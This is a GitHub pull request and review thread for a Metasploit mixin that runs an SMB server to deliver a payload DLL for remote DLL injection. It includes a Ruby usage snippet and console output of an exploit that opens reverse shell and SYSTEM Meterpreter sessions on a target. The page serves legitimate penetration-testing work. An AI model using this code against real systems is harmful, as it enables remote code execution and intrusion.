
Implement SMBFileServer mixin. #3075

Closed
wants to merge 12 commits into
from

9 participants
Contributor

0x41414141 commented Mar 7, 2014

In order to accomplish remote file injection (e.g. DLL) this module
emulates an SMB service process to allow clients to load a file from a
network share.

This commit implements the SMBFileServer exploit module utilising the
::Rex::Proto::SMB::Server module to export the "start_smb_server"
function.

Utilising the module (example):

```ruby
include Msf::Exploit::Remote::SMBFileServer

exe = generate_payload_dll
@exe_file = rand_text_alpha(7) + ".dll"
@share = rand_text_alpha(5)
# Advertise the outbound source address when SRVHOST is the wildcard bind address
my_host = (datastore['SRVHOST'] == '0.0.0.0') ?
  Rex::Socket.source_address : datastore['SRVHOST']
# UNC path \\host\share\file.dll; each "\\" in the literal is one backslash
@unc = "\\\\#{my_host}\\#{@share}\\#{@exe_file}"
start_smb_server(@unc, exe, @exe_file)
# Inject DLL
handle
```

A separate commit will provide a sample implementation of utilising this
module within a generic webserver DLL injection exploit:
./exploits/windows/http/generic_http_dllinject.rb

Implement SMBFileServer mixin.
Contributor

wchen-r7 commented Mar 7, 2014

ccing @jlee-r7 because he's been working on smb.

Contributor

0x41414141 commented Mar 7, 2014

Noting build failure due to requirement to merge #3074

Contributor

Meatballs1 commented Mar 8, 2014

Awesome, I just merged this (and rex PR) into the Nvidia Mental Ray exploit and it worked like a charm:

msf exploit(nvidia_mental_ray) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.151:4444 
[*] Generating our malicious binary...
[*] Ready to deliver your payload on \\192.168.1.151\wrXaY\RywMfSx.dll
[*] Payload sent
[*] 192.168.1.117    nvidia_mental_ray - Connected to Listener
[*] Command shell session 1 opened (192.168.1.151:4444 -> 192.168.1.117:54397) at 2014-03-08 16:10:33 +0000

Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Program Files\Autodesk\mrsat3.11.1-maya2014\bin>
msf exploit(nvidia_mental_ray) > exploit

[*] Started reverse handler on 192.168.1.151:4444 
[*] Generating our malicious binary...
[*] Ready to deliver your payload on \\192.168.1.151\dYHZv\igkrYps.dll
[*] Payload sent
[*] 192.168.1.117    nvidia_mental_ray - Connected to Listener
[*] Sending stage (971264 bytes) to 192.168.1.117
[*] Meterpreter session 2 opened (192.168.1.151:4444 -> 192.168.1.117:54414) at 2014-03-08 16:12:07 +0000

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

@Meatballs1 Meatballs1 referenced this pull request Mar 8, 2014

Closed

Nvidia Mental Ray Service Exploit #3079

2 of 4 tasks complete
Contributor

Meatballs1 commented Mar 8, 2014

Hmm I would expect this to be 'Passive' like an HTTP exploit - it will just sit in the background until a connection from the client arrives?

Contributor

0x41414141 commented Mar 9, 2014

Awesome :-) glad to see it works for you as well. It could be refactored easily enough to be a passive service, for the exploit I was working on I just needed to spin up an smb server to serve a file. The 'def cleanup' means the server will be closed once 'handle' is called. This could be ifdef'd to either close automatically, or specifically call 'stop' if another function is called.

@jlee-r7 jlee-r7 commented on an outdated diff Mar 10, 2014

lib/msf/core/exploit/smb.rb
@@ -826,6 +826,56 @@ def smb_error(cmd, c, errorclass, esn = false)
end
+# Name: SMBFileServer
+# Description: In order to accomplish remote file injection (e.g. DLL) this module emulates an SMB service process to allow clients to load a file from a network share.
@jlee-r7

jlee-r7 Mar 10, 2014

Contributor

Doc comments should follow yardoc conventions and wrap at 78 columns, please

@jlee-r7 jlee-r7 commented on an outdated diff Mar 10, 2014

lib/msf/core/exploit/smb.rb
-end
+ attr_accessor :server
+
+ SERVER = ::Rex::Proto::SMB::Server
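Review bot: the only removed line in this hunk is an `end`, and no `+end` appears in view; confirm the enclosing module's closing `end` is re-added after the new block so `lib/msf/core/exploit/smb.rb` still parses once the mixin is appended.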
@jlee-r7

jlee-r7 Mar 10, 2014

Contributor

unused

@jlee-r7 jlee-r7 commented on an outdated diff Mar 10, 2014

lib/msf/core/exploit/smb.rb
-end
+ attr_accessor :server
+
+ SERVER = ::Rex::Proto::SMB::Server
+ UTILS = ::Rex::Proto::SMB::Utils
@jlee-r7

jlee-r7 Mar 10, 2014

Contributor

This is unnecessary, just use the class name where you need it

@jlee-r7 jlee-r7 commented on an outdated diff Mar 10, 2014

lib/msf/core/exploit/smb.rb
+ def initialize(info = {})
+ super
+ register_options(
+ [
+ OptString.new('SRVHOST', [ true, 'The local host the SMB Server is running on', '0.0.0.0']),
+ OptPort.new('SRVPORT', [ true, "The local port to listen on.", 445 ])
+ ], self.class)
+ register_advanced_options(
+ [
+ OptBool.new('SMB_DEBUG', [ false, 'Enable SMBServer debugging messages', false])
+ ], self.class )
+ @server = nil
+ end
+
+ def cleanup
+ super
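Review bot: `SRVPORT` defaults to 445, which on Linux and macOS can only be bound by root and on Windows is already held by the host's own SMB service, so the option description (or the module doc comment) should say so and `start_smb_server` should report a bind failure rather than letting the module wait for a client that can never connect. Since `cleanup` stops the server, also set `@server = nil` after the stop so a repeat run via `rexploit` (as in the session output above) never calls `stop` on an instance that is already closed.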
@jlee-r7

jlee-r7 Mar 10, 2014

Contributor

Stopping the server should happen in an ensure in case the super raises.

```ruby
def cleanup
  begin
    super
  ensure
    # Runs even if super raises, so the listener is never left open
    @server.stop if @server
  end
end
```

@jlee-r7 jlee-r7 commented on an outdated diff Mar 10, 2014

lib/msf/core/exploit/smb.rb
-end
+ attr_accessor :server
+
+ SERVER = ::Rex::Proto::SMB::Server
+ UTILS = ::Rex::Proto::SMB::Utils
+
+ def initialize(info = {})
+ super
+ register_options(
+ [
+ OptString.new('SRVHOST', [ true, 'The local host the SMB Server is running on', '0.0.0.0']),
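Review bot: `SRVHOST` does double duty here, as the bind address and (in the snippet in the PR description) as the host written into the UNC path, and the default `0.0.0.0` is only valid for the first use; document that callers must substitute a routable address when it is the wildcard, or have the mixin do that substitution once so every module does not repeat the `Rex::Socket.source_address` dance.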
@jlee-r7

jlee-r7 Mar 10, 2014

Contributor

This should be an OptAddress

0x41414141 added some commits Mar 12, 2014

Tidy lib/msf/core/exploit/smb.rb following feedback from jlee-r7.
 * Doc comments wrap at 78 chars to follow yardoc convention
 * Remove unused :server and SERVER vals
 * Use Utils class directly
 * Stop server within an ensure
 * Change SRVHOST to an OptAddress

@todb-r7 todb-r7 added the library label May 30, 2014

Contributor

hdm commented Jul 6, 2014

Marking as delayed since this depends on a lot of rework in #3074

@hdm hdm added the delayed label Jul 6, 2014

@todb-r7 todb-r7 added the feature label Nov 11, 2014

@0x41414141 0x41414141 referenced this pull request Dec 22, 2014

Merged

CVE 2014-2623 - HP Data Protector 8.10 RCE #4451

0 of 3 tasks complete
Contributor

todb-r7 commented Jan 21, 2015

This depends, still, on #3074, which does appear to be live (committed against less than a month back).

However, it is in a conflict state, so that'll want to get resolved (likely against #3074).

@jvazquez-r7 jvazquez-r7 self-assigned this Feb 13, 2015

jvazquez-r7 added a commit to jvazquez-r7/metasploit-framework that referenced this pull request Feb 13, 2015

wvu-r7 and others added some commits Feb 17, 2015

Implement SMBFileServer mixin.
Tidy lib/msf/core/exploit/smb.rb following feedback from jlee-r7.
Merge branch 'module-exploitsmbfileserver' of github.com:0x41414141/metasploit-framework into module-exploitsmbfileserver

@todb-r7 todb-r7 removed the delayed label Feb 18, 2015

Contributor

jvazquez-r7 commented Feb 19, 2015

It is being handled on #3074.

@Meatballs1 Meatballs1 referenced this pull request Mar 5, 2015

Merged

Nvidia mental ray take 3 #4884

5 of 5 tasks complete

@0x41414141 0x41414141 deleted the 0x41414141:module-exploitsmbfileserver branch Mar 6, 2015

@bcook-r7 bcook-r7 added the delayed label Feb 1, 2016
